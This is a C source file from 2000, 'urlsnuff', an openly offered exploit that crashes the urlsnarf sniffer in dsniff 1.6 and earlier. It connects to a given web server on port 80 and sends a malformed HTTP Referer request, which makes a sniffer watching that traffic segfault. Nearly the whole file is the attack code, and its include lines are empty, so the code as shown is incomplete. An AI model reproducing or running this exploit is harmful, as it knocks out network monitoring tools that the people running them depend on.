/* * public release date: 03/16/2000 * * "They're after me Lucky Charmz" - Happy Irish Day [3/17/2000] * so i'm celebrating the day before too... uNF =P * * urlsnuff - stupid remote urlsnarf dos attack (works on dsniff <=1.6) * by obecian * * notes: i decided to look at dugsongs code and was playing with urlsnarf * and noticed something amusing -- yeah so it's lame - it's still effective * urlsnarf will die if it sees this malformed combination of HTTP Requests * i'm sure there's other combinations, but i'm out of time, and i discovered * this completely on accident * * greetz: cripto, bind, ph1x, quakemstr, curq, kgbud, arethusa ssh irc krew, * openbsd core team (you guys kick ass!), and everyone else i forgot * */ #define TITLE "urlsnuff - urlsnarf snuffer (works on dsniff <= 1.6)" #define CODER "(c) 2000 obecian " #include #include #include #include #include #include #include #include void usage(char *); int main(int argc, char **argv) { int numbytes; int sock; struct sockaddr_in sin; struct hostent *he; char buffsnuff[1024]; char *webserver; if (argc < 2) {usage(argv[0]); exit(1);} webserver = argv[1]; if ((he = gethostbyname(webserver)) == NULL) {herror("gethostbyname"); exit(1);} if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {perror("socket"); exit(1);} sin.sin_family = AF_INET; sin.sin_port = htons(80); sin.sin_addr = *((struct in_addr *)he->h_addr); bzero(&(sin.sin_zero), 8); printf("connecting to arbitrary webserver...\n"); if (connect(sock, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) {perror("connect"); exit(1);} printf("throwing amusement =*)\n"); /* we send a legitimate prefix so urlsnarf deals with it, but then we take advantage and give it an inappropriate suffix and BARF - we see our friend mr. segfault */ snprintf(buffsnuff, sizeof(buffsnuff), "Referer: http://celerity.bartoli.org\r\n\r\n"); if ((write(sock, &buffsnuff, sizeof(buffsnuff)))<0) {perror("write"); exit(1);} printf("urlsnarf seg request thrown... sniffer be gone\n\n"); close(sock); exit(0); } void usage(char *arg) { putchar('\n'); puts(TITLE); puts(CODER); putchar('\n'); printf("usage: %s \n", arg); return; }